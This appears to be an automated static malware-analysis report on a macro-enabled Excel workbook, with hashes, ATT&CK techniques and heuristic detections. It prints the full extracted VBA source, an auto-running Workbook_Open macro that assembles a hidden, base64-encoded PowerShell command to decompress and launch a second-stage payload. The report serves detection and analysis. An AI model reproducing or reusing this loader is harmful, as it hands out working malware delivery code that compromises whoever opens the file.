Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bcfd44785a2ce617…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2021-06-11 12:59:20 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-07-07
MD5: 55a84c152d137ba40f8b79095a24871a SHA-1: a8c51a39bf2f458eec6fda1ea5f506446ef2e350 SHA-256: bcfd44785a2ce617a3cef809da911eeeb65d2a1d059761b48dd2f1bd6d201b09
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information

The Workbook_Open macro in the sample constructs and executes a PowerShell command. This command is heavily encoded and appears to be designed to download and execute a second-stage payload. The use of Shell() and WScript.Shell indicates a clear intent to execute arbitrary code.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("WScript.Shell").Run Str
End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject("WScript.Shell").Run Str
End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Str As String
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9239 bytes
SHA-256: a541f9afe2cfd52e3b75612847266b4be4cd712432f7c3264c230c034d3401b6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 54 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Str As String
    Str = "po"
    Str = Str + "wer"
    Str = Str + "she"
    Str = Str + "ll."
    Str = Str + "exe -n"
    Str = Str + "op -w hi"
    Str = Str + "dde"
    Str = Str + "n -"
    Str = Str + "e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGU"
    Str = Str + "AcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGk"
    Str = Str + "AbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0"
    Str = Str + "ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHM"
    Str = Str + "ALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
    Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8"
    Str = Str + "ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8"
    Str = Str + "AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGU"
    Str = Str + "AYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEk"
    Str = Str + "AQQBBADEAZAB3ADIAQQBDAEEANwBWAFcAKwAyAC8AYQBTAEIARAArAE8AWgBIADYAUAAxAGcAVgBrAG0AMQBCAEEAUABOAEkAbQBrAGkAVgB6AGoAYQBZAFY"
    Str = Str + "AMwBpAGEAVgAwAHIAUgBhAGIARQBYAGUAMgBIAHQAaABmAFgAYQA0AFAAVAA2AHYAOQA4AGEAYwBKAHEAcQBhAGQAVwBlAGQAQgBZAFMANgA5ADIAWgAyAFo"
    Str = Str + "AbAB2AHYAcABuAHgATwB2AFEAdABoAG8AZwB2AE8ASABaAEQAKwBQAEwAdQArAG0AbwBBAEsAUABBAEUASwBZAE8AdABuAEoAQQBoAEwAZABTAFIAcgA2ADc"
    Str = Str + "ANABkAHUAWgBvAGoAYQBFAHIAZgBCAFMAawBoAGIAcgBiADEAWQBnAEgAawBMADkAOABlAE4AQgBEAFMAcQBIAFAAegB1AC8ANQBCAG0AUgBxAEUARQBCAHY"
    Str = Str + "AaABSAEUATQBKAEYAbgA0AFIANQBpADUAawBNAEsAYgAvAG0AbwBEAEwAUwBaADgARQBUAEoALwA1AHgAdQBZAHIAQQBDACsAaQBNAFUANgBzAEYAdwBvADM"
    Str = Str + "ASwBpACsAbgBaAHcAOQBFAGcAcwBrAHoAdQBUAE4ASABVAFoATQBFAGoAOQAvAEYAdQBYAEYAagBiAEwATQAxAC8AYwBoAHcASQBFAGsAbQBuAEgAQQBvAEo"
    Str = Str + "AZQAzAE0AUgBaAGwANABhAHUAYwBYAEQAaQBPAGQAMQBBAFMAdQA4AGkAaQBKAEMAQgByAGwAcAA4AGgAdgAxAHoASwBUAC8AdwBBAHIARwBHAFAAVwA0AHQ"
    Str = Str + "AZwBGAHoASwBYADIASQBFAG8AOAB6AEQANABqADAASQBXAFUAbAA4ADQAQgA1AFIAWQBPAEoAOQBMAEkAbAA4AE8ASwBMAEYAVQAyADYAWQB3AEMATQBTAGM"
    Str = Str + "AcwBFAGgAcwBMADUAYgBMAHYANgBUAEYANQBlAEoAUgA2AEQAUABrAHcAWAB6AEwAWgA1AEMAUwBuAFEAbABwAGgAQwB3AFkANQBKAHYAQQB0AHoARQBjAHc"
    Str = Str + "AZgBXAFMAYQA1AG0ATQBJAHQAOQBaAHkAagBJAFgAaQA4AGcAVwBTAGgAawAvAHgARABnAG4ALwBJAGsAWgBxAFEAYwBQAEsAVwB5AC8AcQB5AFMAOQBWAHU"
    Str = Str + "ASgBTAEEAMABiAGwASABNAC8AawBXADQARgAyAGkAUgAxAGkAZQBGAFkAVgAzAC8AQwBVAHAAMQAvAG0AVAAwAG8AQgBEAHQAMwBYAGQAOQBmAHYAcgB0AGM"
    Str = Str + "AcABXADQATAB2AHkATQBKAFgAVgA0AHYAVABHAG4ATABmAHAAQQBFAEoAMABFAG4AcQBvADEARABNAEMAVgAxACsAQwBXAEMARQB4AHYAdwAxAE0ANgBZAGg"
    Str = Str + "AbABKAGMAdgB5AEEAbwBaAFAARABDAE8AUgB1ADcAbgBCAHAAUgBVAG0AcwB2AFMAZABiAGYAVwA0AEgAdQBMAEsAVQBIADIAawB1AHQAYwBNAHAAbwBKAEg"
    Str = Str + "AVwBKAFcAawA0AE8AZgBVADcATQBHADEAOABpAEgAdABkAGcASABIAHIASgBTADkAawBsAHYAdwBRAHoAWABHAEoANgBDAHoASwBkAGkAUABlADYAVwBKAEY"
    Str = Str + "ANABPAG8ARgAyAEQARwBEAHEAQQBKAGIAZwBsADIAZgA1AEIAcgBlADQAaAA5AHEASwByAGgAUQBqAGIAawBLAG8AVwBUADEAWABBAHYAZQBKAFoAbABMADk"
    Str = Str + "AMwA1AHAAdwBLAFMAVwB6ADUAWABlAGgAeABtAE0ANwB2AG4ASAA2AFoATgBlAGMAOABUAEsAVQB2AFAASQAvAFQAMgA1AE4AMwBMAGkAVABxAEcAQQBSAEI"
    Str = Str + "AVABoAGkARQB2AE8AaAA0AHkAWgBvAFEAWQBHAGoAbgBCAE4AVQBQADAATwBWAEkARABSAGsANQBMAGMAVgB2ADcAbgBaAEQAegBKAEEARgBBAHAAYQBhAFc"
    Str = Str + "AOABvAHYAUQBGADQAdQAxAEkAawBmAE0AQgBwAGEAUABIAFUAOAArAEwARwA1AGcAeABZAEMATwBNAEUAaQBKAHoAUwBSAEQAYgBYAFkAUgBFADUANgBzAGY"
    Str = Str + "AZwBtAEUAagByAEEAbQBKAGMAQwB0AHgAVAB4AFQAUABDAGQAQgBBAEcAVABKAFkAUwBnADMATQBkAHoAOAB1AFcAOABDAFYAbgBMADIAMgBIAG8AYwBhAEY"
    Str = Str + "AVAAvAFIAcwBZAE8ATAB6AGEATAA0AHcALwBVAFEAZwA0ADAAQgBaAC8AOABEAEYAbAA5AEoAbQArAEMAUgB3AHAARABxADgAOAA1AEQAawAyAE0AVwBFADU"
    Str = Str + "AWQBZAG8AbwA0ADMAMABrAGcAZgBaAEUAcABmAC8AbwB3AGEAcwBlAGMAdgBaAEYAcAAvAEMAUwBFAEMAawB0AGwASQBVAFcAcwA0AFQAZwBHAGQAeQB5ADk"
    Str = Str + "ASQBTAFoARgAzAEIATwBVAEYARABHAFkAVABBAG8AOABUAFEAUQB3AE4AdgBLAHUAVgA5AEkANwAwAFAALwAwADgARABTADUAcQBCAG8ANAAyAEoANwBNAEY"
    Str = Str + "AcAAzAEwAZQA4ADQAZgB6AGIAbQBSAG0AdgBRADEATgBUAGUAdgBOADQAMgBiADIATgBVAG4AcABIAE4AYgBOAHkASwBKAHQAbQBhAFUAbgAzAEMAcgBhAGQ"
    Str = Str + "AbwBZAEwAUAArAGIARgBOAFcAdABpAFYAcgAzAHEAagBjADcAZwAvAHgAbgBIAGEAbQBoACsAeQB4AE4AOQB0AHYAUgB1AEIAdQBXAG4AZgAzAGYAawBXAEQ"
    Str = Str + "AdABmAG4AegBQAGkANgBGADcAZQBhAEEAYgByAHYAMAB1AFQAQwBLADEAaABvAEcAdgBCADkAMwBuAGoAdQByAHIASwBvAGcAcQA3AEIAVAAyAHEAdABqAHY"
    Str = Str + "AVgBMAHIANwBPAGgAVwBhADYAeAA2AGoAYgBMAHEAagBkAHQAQgBPAFYANABGAG8ARQA0AGMAbABzADEAcQBkADEAbQBqAFAAeAA3AGkAdwBtAFAAUABQAGM"
    Str = Str + "AeQBCAEEAZgBRADEAbgBhADMAMgA3AGYANQB1AFgAZQB4AFAAbwA3AGIAdQBxAE0AagBTAEkAQQBwADYAUwB0AFEAdQBPAEwANAB6AEcAbQBaAEQASAB3ADM"
    Str = Str + "AMgBRADYAOQA1ADcAOAAvAFUAcgBXAEwARgBvADAANQBqAGMAMQArADEAaABsADMAZwB1AHQARQBSAGwAWABhADIAeQBpAHoANAAyAEsAUwBWAE8AbABhAE8"
    Str = Str + "AbwB6AEcAOABjADUAcwBoAGQAZQBMAEoAawBVAFIAWgBqADQAMAA2ADkAOQBVAFAAOQBRAFAAVwBxAG0AYQAvADAAaABrADkAdQAzAHIANQByAG0ANQA4ADg"
    Str = Str + "AdgBxADAAMQArADYAdgBCAHIAVgBEAEoAVgB2AFUAZQB1AGEAcQAzAGMAZgA2ADAAMwB6AHkAUgBQAFgAKwB5AEoAaQBBAHUAZQBhAHIAbwArAHIAKwBzAE8"
    Str = Str + "AdABVAEYAUQBWAEYAQQBaAGwAbQBSADQAVgB1AGQAbABJAFoAbABrAHYAYQBwAGwANAB2AFAARwA2AFAAcgBCAGoAcwBzAGkANwBiAEcAdAA2AEsARwBmAGU"
    Str = Str + "AMQBMAEgASwA2ADMAaQBZAEMAUQB4AFEAaQA0ADQAaQBKAEUANAAwAFAAVAB2AFgAVwBYAHoAWABNACsANgBjAEEAOQBMAFcATgBOAG0AMwBnAGIATwAxAEQ"
    Str = Str + "ATwBRAHIAMQBlAGgAcwBwAE0AOQBnAG0AYQBGAHYAdwBQADkAUgAwAHUAdwBIADIAUwBxAEYAMwBWAEIALwByAGgAagBJAHAAKwA2AHYAWgBxAE4AdQBDAG0"
    Str = Str + "AMABPAGgAZQByAEEANQBLAFIAVQB5AG4ASgBhAGUAYgBqAHQAbQBtAFQAcAAxAGQAbgBnADYAegBwAFcAagBIAHMANABQAGQAMwBkAFQAVwBuAEcAbgBwAFg"
    Str = Str + "ANABWAGwATgBSAHkAVgBBAHUAbgBsAFoAYgBlAGEATgBvADkARgBoAHkAcwBqAGEAcwAxAGgAMwBEAGEAMgBKAFQAZQBKADgAVABqAHoATQB2AFkAQQA3AC8"
    Str = Str + "AVQBlAEUAVwBvAG4AMAAyAEYATABxAEMAQgBDAHoAQQBuAEcAdQAvADIAYQBaAEUAYgBoAEIAcQBYAEQAagA0AGcASwBOAEcAUQBwAEcAVAB1AGIAeQBIADE"
    Str = Str + "ASQBlAFoAagBrAHcALwBXAHQARQBwAFUAagBJAG0AVgB6AEEALwBlADYAdgBuAGsATwBzACsAVABaAEwAeABOACsATABKAGMAZQBuAE0AbABDAHkAKwBDADg"
    Str = Str + "AcgBlAGgAawBtADQAOQBQAEgAegBpAEwAaQBaAEYAeAAyAHMAaQAvAHcAaAA5AGgANwBtADUANAByAEYAYwBMAFAASQBwAFUAVAB4AFcAaQBqAHoARwAzAHc"
    Str = Str + "AOQBMAEoANwB0AFkATwBwAG4ASwBKAFYAUABtAEQARQB4AHEASABKACsATQB5ADAAawBsAFoAbABpAHcAdQBUAFgALwBWADgAUQB1ADkAZQAvAHkAUAAvAHY"
    Str = Str + "AWABpAEgAMwBiACsAOABYAHAAYgA2AEYAWQB6AEYAMABpAC8AbQBIAC8AKwA0ADAALwB3AHYAUgBQAEEANQA4AEIAeABMAGkAZwB5AGQAcwBYAGgAdQBjAHg"
    Str = Str + "AKwBsAGIAOABGADMASwA4ACsAcwB3ADQANQBZAFQAbgBmAG4AMQA1AGsAawAvAEYAZgBzAGgAdQBlAHYAegB6ADQAOQAzADEAdgA0ADgAZQBuAEQASwBVAEM"
    Str = Str + "AZwBBAEEAJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8"
    Str = Str + "AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGw"
    Str = Str + "ARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHU"
    Str = Str + "AZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQ"
    Str = Str + "AdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQ"
    Str = Str + "AcwApADsA"
    
    CreateObject("WScript.Shell").Run Str
End Sub

Attribute VB_Name = "工作表1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "工作表2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "工作表3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 28672 bytes
SHA-256: 2010ba2b9f61d4f54e0a638176160c1d25a39d92418b521ce4154d5aaaedcb3c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 54 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.